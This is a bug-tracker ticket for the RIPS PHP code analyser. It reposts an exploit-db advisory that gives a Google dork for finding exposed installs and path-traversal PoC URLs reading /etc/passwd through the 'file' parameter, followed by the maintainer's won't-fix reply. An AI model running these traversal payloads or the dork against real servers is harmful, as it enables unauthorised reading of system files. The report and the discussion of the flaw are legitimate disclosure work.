#12 Multiple Local File Inclusion Vulnerabilities

open-wont-fix
nobody
None
5
2012-04-09
2012-03-29
regenpijp
No

Just a copy-paste from exploit-db
http://www.exploit-db.com/exploits/18660/

# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for
vulnerabilities in PHP scripts"
# Althout this script is not intended to be accesible from internet, there
are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: ***@gmail.com
# Follow: @***
# www.***.com.ar

File: /windows/code.php

102: file $lines = file($file);
96: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

File: /windows/function.php

64: file $lines = file($file);
58: $file = $_GET['file'];

PoC:
http://localhost/rips/windows/function.php?file=../../../../../../etc/passwd\(will
read the first line of the file)

Discussion

  • regenpijp
    regenpijp
    2012-03-29

    • priority: 5 --> 7
     
  • regenpijp
    regenpijp
    2012-03-31

    • priority: 7 --> 5
     
  • Johannes Dahse
    Johannes Dahse
    2012-04-09

    • status: open --> open-wont-fix
     
  • Johannes Dahse
    Johannes Dahse
    2012-04-09

    I have discussed this several times, thank you for reporting. of course I know about this issue because (like the "exploit" autor did) I tend to use RIPS against its own source. here are the key facts:

    1) It is not a file inclusion, it is a file disclosure (the "exploit" autor should at least use the help function of RIPS to read what the important difference is)
    2) a file disclosure is absolutely the sence of the code VIEWER
    3) RIPS is a local tool, just because it runs on a webserver doesn't mean it is intented for the www. this hint is also given on the startup page
    4) I can not limit the file extension of included files to a fixed list, because it can be anything or even empty

    summary:
    of course if you give someone access to your local file scanner tool he can read your local files, so I do not intend to fix this. its like giving someone access to your metasploit webinterface and worrying about command execution or access to your phpmyadmin interface and worrying about sql injection. I expect the user of RIPS to have at least a slight interest in security and to be clever enough to not install RIPS on a public webserver or read the startup hints.

    other than that it is absolutely legit to report this issue or make an advisory about it to raise the awareness or find security issues. however the claim that it is a file inclusion vulnerability (that can be avoided in all cases) brings some bad press to the tool ;)

    I leave this topic open for discussion.